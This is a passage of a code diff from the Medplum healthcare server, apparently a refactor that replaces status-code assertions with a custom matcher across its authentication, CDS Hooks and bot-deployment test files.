       .send({ clientId: randomUUID() });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
     expect(res.body).toMatchObject(notFound);
   });
 
@@ -90,7 +90,7 @@ describe('Pre-authorize', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ clientId: client.id, expiresIn: 0 });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(
       badRequest(`expiresIn must be a positive integer not exceeding ${MAX_PRE_AUTH_CODE_TTL} seconds`)
     );
@@ -102,7 +102,7 @@ describe('Pre-authorize', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ clientId: client.id, expiresIn: MAX_PRE_AUTH_CODE_TTL + 1 });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(
       badRequest(`expiresIn must be a positive integer not exceeding ${MAX_PRE_AUTH_CODE_TTL} seconds`)
     );
@@ -115,7 +115,7 @@ describe('Pre-authorize', () => {
       .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount.profile))
       .type('json')
       .send({ clientId: client.id });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.preAuthorizedCode).toBeDefined();
     expect(res.body.expiresAt).toBeDefined();
     expect(res.body.code).toBeUndefined();

--- a/packages/server/src/auth/profile.test.ts
+++ b/packages/server/src/auth/profile.test.ts
@@ -60,7 +60,7 @@ describe('Profile', () => {
     const res = await request(app).post('/auth/profile').type('json').send({
       profile: 'Practitioner/123',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Missing login');
   });
@@ -69,7 +69,7 @@ describe('Profile', () => {
     const res = await request(app).post('/auth/profile').type('json').send({
       login: '123',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Missing profile');
   });
@@ -82,7 +82,7 @@ describe('Profile', () => {
         login: randomUUID(),
         profile: getReferenceString(profile1),
       });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Not found');
   });
@@ -93,7 +93,7 @@ describe('Profile', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
 
     const login = await systemRepo.readResource<Login>('Login', res1.body.login);
@@ -108,7 +108,7 @@ describe('Profile', () => {
       login: res1.body.login,
       profile: membership1.id,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Login revoked');
   });
@@ -119,7 +119,7 @@ describe('Profile', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
 
     const login = await systemRepo.readResource<Login>('Login', res1.body.login);
@@ -134,7 +134,7 @@ describe('Profile', () => {
       login: res1.body.login,
       profile: membership1.id,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Login granted');
   });
@@ -145,7 +145,7 @@ describe('Profile', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
 
     const login = await systemRepo.readResource<Login>('Login', res1.body.login);
@@ -162,7 +162,7 @@ describe('Profile', () => {
       login: res1.body.login,
       profile: membership1.id,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Login profile already set');
   });
@@ -173,7 +173,7 @@ describe('Profile', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeUndefined();
     expect(res1.body.memberships).toBeDefined();
@@ -185,7 +185,7 @@ describe('Profile', () => {
       login: res1.body.login,
       profile: randomUUID(),
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Profile not found');
   });
@@ -206,7 +206,7 @@ describe('Profile', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeUndefined();
     expect(res1.body.memberships).toBeDefined();
@@ -216,7 +216,7 @@ describe('Profile', () => {
       login: res1.body.login,
       profile: membership.id,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Invalid profile');
   });
@@ -227,7 +227,7 @@ describe('Profile', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeUndefined();
     expect(res1.body.memberships).toBeDefined();
@@ -239,7 +239,7 @@ describe('Profile', () => {
       login: res1.body.login,
       profile: res1.body.memberships[0].id,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -262,7 +262,7 @@ describe('Profile', () => {
       password,
     });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.memberships).toBeDefined();
     const updatedMembership = res2.body.memberships.find((p: any) => p.id === membership1.id);
     expect(updatedMembership).toBeDefined();

--- a/packages/server/src/auth/resetpassword.test.ts
+++ b/packages/server/src/auth/resetpassword.test.ts
@@ -67,7 +67,7 @@ describe('Reset Password', () => {
       email: '',
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Valid email address between 3 and 72 characters is required');
     expect(res.body.issue[0].expression[0]).toBe('email');
   });
@@ -77,7 +77,7 @@ describe('Reset Password', () => {
       email: 'admin@example.com',
       recaptchaToken: '',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Recaptcha token is required');
   });
 
@@ -88,7 +88,7 @@ describe('Reset Password', () => {
       email: 'admin@example.com',
       recaptchaToken: 'wrong',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Recaptcha failed');
   });
 
@@ -100,7 +100,7 @@ describe('Reset Password', () => {
         email: `alex${randomUUID()}@example.com`,
         recaptchaToken: 'xyz',
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
 
@@ -121,7 +121,7 @@ describe('Reset Password', () => {
       email,
       recaptchaToken: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     const args = mockSESv2Client.commandCalls(SendEmailCommand)[0].args[0].input;
@@ -149,7 +149,7 @@ describe('Reset Password', () => {
       recaptchaToken: 'xyz',
       sendEmail: false,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
 
@@ -172,7 +172,7 @@ describe('Reset Password', () => {
       email,
       recaptchaToken: '',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     const args = mockSESv2Client.commandCalls(SendEmailCommand)[0].args[0].input;
@@ -216,7 +216,7 @@ describe('Reset Password', () => {
       projectId: project.id,
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(mockCreateTransport).toHaveBeenCalledWith(
       expect.objectContaining({ host: 'smtp.project.example.com', port: 587 })
@@ -251,7 +251,7 @@ describe('Reset Password', () => {
         email: `alice@${domain}`,
         recaptchaToken: 'xyz',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe(
       'Cannot reset password for external auth. Contact your system administrator.'
     );
@@ -294,7 +294,7 @@ describe('Reset Password', () => {
       recaptchaSiteKey,
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     const args = mockSESv2Client.commandCalls(SendEmailCommand)[0].args[0].input;
@@ -339,7 +339,7 @@ describe('Reset Password', () => {
       recaptchaSiteKey,
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({ issue: [{ code: 'invalid', details: { text: 'Invalid recaptchaSecretKey' } }] });
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
@@ -367,7 +367,7 @@ describe('Reset Password', () => {
       recaptchaSiteKey,
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({ issue: [{ code: 'invalid', details: { text: 'Invalid recaptchaSiteKey' } }] });
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
@@ -397,7 +397,7 @@ describe('Reset Password', () => {
     });
 
     // Verify the response and expectations
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.issue[0].details.text).toBe('All OK');
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
@@ -436,7 +436,7 @@ describe('Reset Password', () => {
     });
 
     // Verify the response and expectations
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     // Verify email details
@@ -483,7 +483,7 @@ describe('Reset Password', () => {
     });
 
     // Verify the response and expectations
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     // Get newly created UserSecurityRequest

--- a/packages/server/src/auth/revoke.test.ts
+++ b/packages/server/src/auth/revoke.test.ts
@@ -26,7 +26,7 @@ describe('Revoke', () => {
 
   test('Unauthenticated', async () => {
     const res = await request(app).post('/auth/revoke').type('json').send({ loginId: randomUUID() });
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Revoke session', async () => {
@@ -48,7 +48,7 @@ describe('Revoke', () => {
     // Get sessions 1st time
     // Should be 1 session
     const res1 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body).toBeDefined();
     expect(res1.body.security.sessions).toHaveLength(1);
     expect(res1.body.security.sessions.find((s: any) => s.id === login.id)).toBeTruthy();
@@ -68,7 +68,7 @@ describe('Revoke', () => {
     // Get sessions 2nd time
     // Should be 2 sessions
     const res2 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toBeDefined();
     expect(res2.body.security.sessions).toHaveLength(2);
     expect(res2.body.security.sessions.find((s: any) => s.id === login.id)).toBeTruthy();
@@ -80,12 +80,12 @@ describe('Revoke', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ loginId: login2.id });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Get sessions 3rd time
     // Should be 1 session
     const res4 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body).toBeDefined();
     expect(res4.body.security.sessions).toHaveLength(1);
     expect(res4.body.security.sessions.find((s: any) => s.id === login.id)).toBeTruthy();
@@ -98,7 +98,7 @@ describe('Revoke', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(res5.status).toBe(400);
+    expect(res5).toHaveStatus(400);
 
     // Try to revoke a random session
     // This should fail
@@ -107,7 +107,7 @@ describe('Revoke', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ loginId: randomUUID() });
-    expect(res6.status).toBe(404);
+    expect(res6).toHaveStatus(404);
   });
 
   test('Different user', async () => {
@@ -158,6 +158,6 @@ describe('Revoke', () => {
       .set('Authorization', `Bearer ${aliceAccessToken}`)
       .type('json')
       .send({ loginId: bobLogin.id });
-    expect(revokeResponse.status).toBe(404);
+    expect(revokeResponse).toHaveStatus(404);
   });
 });

--- a/packages/server/src/auth/scope.test.ts
+++ b/packages/server/src/auth/scope.test.ts
@@ -40,7 +40,7 @@ describe('Scope', () => {
     const res = await request(app).post('/auth/scope').type('json').send({
       scope: 'openid profile',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Missing login');
   });
@@ -49,7 +49,7 @@ describe('Scope', () => {
     const res = await request(app).post('/auth/scope').type('json').send({
       login: '123',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Missing scope');
   });
@@ -59,7 +59,7 @@ describe('Scope', () => {
       login: randomUUID(),
       scope: 'openid profile',
     });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Not found');
   });
@@ -70,7 +70,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
 
     const login = await systemRepo.readResource<Login>('Login', res1.body.login);
@@ -85,7 +85,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Login revoked');
   });
@@ -96,7 +96,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
 
     const login = await systemRepo.readResource<Login>('Login', res1.body.login);
@@ -111,7 +111,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Login granted');
   });
@@ -122,7 +122,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
 
     const login = await systemRepo.readResource<Login>('Login', res1.body.login);
@@ -137,7 +137,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Login profile not set');
   });
@@ -148,7 +148,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeDefined();
 
@@ -156,7 +156,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -166,7 +166,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeDefined();
 
@@ -174,7 +174,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile patient/Condition.rs?category=health-concern',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Invalid scope');
   });
@@ -185,7 +185,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeDefined();
 
@@ -193,7 +193,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile patient/Condition.read', // V1 scope is equivalent to `rs`, a subset of the one above
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -203,7 +203,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeDefined();
 
@@ -211,7 +211,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile patient/Condition.rs?category=health-concern',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -221,7 +221,7 @@ describe('Scope', () => {
       email,
       password,
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.login).toBeDefined();
     expect(res1.body.code).toBeDefined();
 
@@ -229,7 +229,7 @@ describe('Scope', () => {
       login: res1.body.login,
       scope: 'openid profile patient/Condition.rs?category=health-concern',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(res2.body.issue[0].details.text).toBe('Invalid scope');
   });
@@ -267,7 +267,7 @@ describe('Scope', () => {
         email: mfaEmail,
         password: mfaPassword,
       });
-      expect(loginRes.status).toBe(200);
+      expect(loginRes).toHaveStatus(200);
       expect(loginRes.body.login).toBeDefined();
       expect(loginRes.body.mfaRequired).toBe(true);
       expect(loginRes.body.code).toBeUndefined();
@@ -276,7 +276,7 @@ describe('Scope', () => {
         login: loginRes.body.login,
         scope: 'openid profile',
       });
-      expect(scopeRes.status).toBe(200);
+      expect(scopeRes).toHaveStatus(200);
       expect(scopeRes.body.mfaRequired).toBe(true);
       expect(scopeRes.body.code).toBeUndefined();
     });
@@ -287,7 +287,7 @@ describe('Scope', () => {
         email: mfaEmail,
         password: mfaPassword,
       });
-      expect(loginRes.status).toBe(200);
+      expect(loginRes).toHaveStatus(200);
       expect(loginRes.body.mfaRequired).toBe(true);
 
       const mfaRes = await request(app)
@@ -297,14 +297,14 @@ describe('Scope', () => {
           login: loginRes.body.login,
           token: authenticator.generate(mfaSecret),
         });
-      expect(mfaRes.status).toBe(200);
+      expect(mfaRes).toHaveStatus(200);
       expect(mfaRes.body.code).toBeDefined();
 
       const scopeRes = await request(app).post('/auth/scope').type('json').send({
         login: loginRes.body.login,
         scope: 'openid profile',
       });
-      expect(scopeRes.status).toBe(200);
+      expect(scopeRes).toHaveStatus(200);
       expect(scopeRes.body.code).toBeDefined();
       expect(scopeRes.body.mfaRequired).toBeUndefined();
     });

--- a/packages/server/src/auth/setpassword.test.ts
+++ b/packages/server/src/auth/setpassword.test.ts
@@ -79,11 +79,11 @@ describe('Set Password', () => {
       email,
       recaptchaToken: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     const userInfoRes1 = await request(app).get('/oauth2/userinfo').set('Authorization', `Bearer ${res.accessToken}`);
-    expect(userInfoRes1.status).toBe(200);
+    expect(userInfoRes1).toHaveStatus(200);
     expect(userInfoRes1.body).toMatchObject({
       email,
       email_verified: false,
@@ -102,7 +102,7 @@ describe('Set Password', () => {
       secret,
       password: 'my-new-password',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Make sure that the user can login with the new password
     const res4 = await request(app).post('/auth/login').type('json').send({
@@ -110,7 +110,7 @@ describe('Set Password', () => {
       password: 'my-new-password',
       scope: 'openid',
     });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     const newAccessToken = res4.body.access_token as string;
 
     // Make sure that the PCR cannot be used again
@@ -119,15 +119,15 @@ describe('Set Password', () => {
       secret,
       password: 'bad-guys-trying-to-reuse-code',
     });
-    expect(res5.status).toBe(400);
+    expect(res5).toHaveStatus(400);
 
     // User must log in again
     const userInfoRes2 = await request(app).get('/oauth2/userinfo').set('Authorization', `Bearer ${newAccessToken}`);
-    expect(userInfoRes2.status).toBe(401);
+    expect(userInfoRes2).toHaveStatus(401);
 
     // Make sure that previous active login was revoked
     const userInfoRes3 = await request(app).get('/oauth2/userinfo').set('Authorization', `Bearer ${res.accessToken}`);
-    expect(userInfoRes3.status).toBe(401);
+    expect(userInfoRes3).toHaveStatus(401);
 
     // Ensure other Logins are also revoked
     const otherLogin = await getGlobalSystemRepo().readResource<Login>('Login', login.id);
@@ -166,7 +166,7 @@ describe('Set Password', () => {
       secret: usr.secret,
       password: 'my-new-password',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Make sure that the user can login with the new password
     const res4 = await request(app).post('/auth/login').type('json').send({
@@ -174,7 +174,7 @@ describe('Set Password', () => {
       password: 'my-new-password',
       scope: 'openid',
     });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
   });
 
   test('UserSecurityRequest invalid type', async () => {
@@ -209,7 +209,7 @@ describe('Set Password', () => {
       secret: usr.secret,
       password: 'my-new-password',
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
   });
 
   test('Wrong secret', async () => {
@@ -222,13 +222,13 @@ describe('Set Password', () => {
       password: 'password!@#',
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/resetpassword').type('json').send({
       email,
       recaptchaToken: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     const args = mockSESv2Client.commandCalls(SendEmailCommand)[0].args[0].input;
@@ -243,7 +243,7 @@ describe('Set Password', () => {
       secret: 'WRONG!',
       password: 'my-new-password',
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
   });
 
   test('Breached password', async () => {
@@ -256,13 +256,13 @@ describe('Set Password', () => {
       password: 'password!@#',
       recaptchaToken: 'xyz',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/auth/resetpassword').type('json').send({
       email,
       recaptchaToken: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
     const args = mockSESv2Client.commandCalls(SendEmailCommand)[0].args[0].input;
@@ -281,7 +281,7 @@ describe('Set Password', () => {
       secret,
       password: 'breached',
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body).toMatchObject(badRequest('Password found in breach database'));
   });
 
@@ -294,7 +294,7 @@ describe('Set Password', () => {
         secret: generateSecret(16),
         password: 'my-new-password',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Missing secret', async () => {
@@ -303,7 +303,7 @@ describe('Set Password', () => {
       secret: '',
       password: 'my-new-password',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Missing password', async () => {
@@ -315,7 +315,7 @@ describe('Set Password', () => {
         secret: generateSecret(16),
         password: '',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Not found', async () => {
@@ -327,6 +327,6 @@ describe('Set Password', () => {
         secret: generateSecret(16),
         password: 'my-new-password',
       });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 });

--- a/packages/server/src/auth/status.test.ts
+++ b/packages/server/src/auth/status.test.ts
@@ -35,17 +35,17 @@ describe('Status', () => {
 
   test('Missing login parameter', async () => {
     const res = await request(app).get('/auth/login/');
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Invalid login parameter', async () => {
     const res = await request(app).get('/auth/login/x');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Login not found', async () => {
     const res = await request(app).get('/auth/login/' + randomUUID());
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Success', async () => {
@@ -59,7 +59,7 @@ describe('Status', () => {
     );
 
     const res = await request(app).get('/auth/login/' + login.id);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toStrictEqual(login.id);
   });
 
@@ -75,7 +75,7 @@ describe('Status', () => {
     );
 
     const res = await request(app).get('/auth/login/' + login.id);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Revoked', async () => {
@@ -90,6 +90,6 @@ describe('Status', () => {
     );
 
     const res = await request(app).get('/auth/login/' + login.id);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 });

--- a/packages/server/src/auth/verifyemail.test.ts
+++ b/packages/server/src/auth/verifyemail.test.ts
@@ -68,14 +68,14 @@ describe('Verify email handler', () => {
           id: usr.id,
           secret: usr.secret.slice(0, -1),
         });
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
 
       // Successfully verify email
       const res2 = await request(app).post('/auth/verifyemail').type('json').send({
         id: usr.id,
         secret: usr.secret,
       });
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
 
       // Check that the security request was marked as used
       const afterVerifyResult = await systemRepo.readResource<UserSecurityRequest>('UserSecurityRequest', usr.id);
@@ -90,7 +90,7 @@ describe('Verify email handler', () => {
         id: usr.id,
         secret: usr.secret,
       });
-      expect(res3.status).toBe(400);
+      expect(res3).toHaveStatus(400);
     }));
 
   test('Incorrect UserSecurityRequest.type', async () => {
@@ -99,13 +99,13 @@ describe('Verify email handler', () => {
       id: invite.id,
       secret: invite.secret,
     });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
 
     const reset = await createUserSecurityRequest(systemRepo, user, 'reset');
     const res2 = await request(app).post('/auth/verifyemail').type('json').send({
       id: reset.id,
       secret: reset.secret,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
   });
 });

--- a/packages/server/src/cds/routes.test.ts
+++ b/packages/server/src/cds/routes.test.ts
@@ -49,7 +49,7 @@ describe('CDS Hooks', () => {
         },
       });
 
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     cdsHookBot = res1.body as WithId<Bot>;
 
     const res2 = await request(app)
@@ -91,7 +91,7 @@ describe('CDS Hooks', () => {
   `,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .post('/fhir/R4/Bot')
@@ -103,7 +103,7 @@ describe('CDS Hooks', () => {
         runtimeVersion: 'vmcontext',
       });
 
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     normalBot = res3.body as WithId<Bot>;
   });
 
@@ -115,7 +115,7 @@ describe('CDS Hooks', () => {
     const res = await request(app)
       .get('/cds-services')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toEqual({
       services: [
         {
@@ -155,7 +155,7 @@ describe('CDS Hooks', () => {
           },
         },
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/json; charset=utf-8');
     expect(res.body).toBeDefined();
     expect(res.body.cards).toBeDefined();
@@ -170,6 +170,6 @@ describe('CDS Hooks', () => {
         resourceType: 'Patient',
         name: [{ given: ['John'], family: ['Doe'] }],
       });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 });

--- a/packages/server/src/cloud/aws/deploy.test.ts
+++ b/packages/server/src/cloud/aws/deploy.test.ts
@@ -57,7 +57,7 @@ describe('Deploy', () => {
         name: botProps?.name ?? 'Test Bot',
         runtimeVersion: botProps?.runtimeVersion ?? 'awslambda',
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const bot = res.body as Bot;
 
     // If additional properties are needed (e.g. timeout, code), update the bot
@@ -68,7 +68,7 @@ describe('Deploy', () => {
         .set('Content-Type', ContentType.FHIR_JSON)
         .set('Authorization', 'Bearer ' + accessToken)
         .send({ ...bot, ...extraProps });
-      expect(updateRes.status).toBe(200);
+      expect(updateRes).toHaveStatus(200);
       return updateRes.body as Bot;
     }
 
@@ -188,7 +188,7 @@ describe('Deploy', () => {
         }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(2);
     expect(mockLambdaClient.commandCalls(ListLayerVersionsCommand)).toHaveLength(1);
@@ -227,7 +227,7 @@ describe('Deploy', () => {
         `,
         filename: 'updated.js',
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(1);
